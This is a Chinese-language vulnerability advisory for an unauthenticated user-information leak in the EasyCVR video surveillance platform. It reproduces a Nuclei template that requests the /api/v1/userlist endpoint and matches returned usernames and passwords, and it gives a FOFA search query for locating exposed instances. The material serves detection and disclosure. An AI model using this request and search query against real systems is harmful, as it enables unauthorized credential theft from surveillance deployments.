EasyCVR 用户信息泄露漏洞

漏洞信息

漏洞名称： EasyCVR 用户信息泄露漏洞

漏洞类型： 信息泄露

漏洞等级： 中危

漏洞描述： EasyCVR是一款视频管理平台，广泛应用于视频监控、智能安防等领域，支持多种视频流的接入、处理、存储和分发。该平台因其功能全面和易于集成，被许多企业和机构采用。本次发现的漏洞属于信息泄露类型，具体表现为通过未授权的API端点/api/v1/userlist?pageindex=0&pagesize=10暴露用户敏感信息，包括用户名、密码和角色名称等。漏洞的技术根源在于缺乏对敏感接口的访问控制和权限验证，导致攻击者无需认证即可获取用户数据。这种漏洞可能导致攻击者利用泄露的信息进行进一步的攻击，如密码破解、权限提升或直接登录系统，进而威胁到整个视频监控系统的安全。由于漏洞利用简单，且影响范围可能涉及所有使用受影响版本EasyCVR的系统，因此被评定为中危漏洞。

产品名称： EasyCVR

搜索语法： title=”EasyCVR”

来源： https://github.com/projectdiscovery/nuclei-templates/blob/d4710dd1254bf6916f276f80ee5dffce67aed78a/http%2Fvulnerabilities%2Feasycvr-user-info-disclosure.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: easycvr-user-info-disclosure

info:
  name: EasyCVR User - Information Disclosure
  author: dostghost
  severity: medium
  description: |
    The EasyCVR Video Management Platform is vulnerable to user information leakage. This template checks for exposed user information through the endpoint `/api/v1/userlist?pageindex=0&pagesize=10`.
  reference:
    - https://github.com/AboSteam/POPC/blob/main/EasyCVR%20%E8%A7%86%E9%A2%91%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%E5%AD%98%E5%9C%A8%E7%94%A8%E6%88%B7%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2.md
  metadata:
    fofa-query: title="EasyCVR"
  tags: exposure,easycvr

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/userlist?pageindex=0&pagesize=10"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Username":'
          - 'Password":'
          - 'count":'
          - 'RoleName":'
        condition: and

      - type: word
        part: content_type
        words:
          - application/json

      - type: status
        status:
          - 200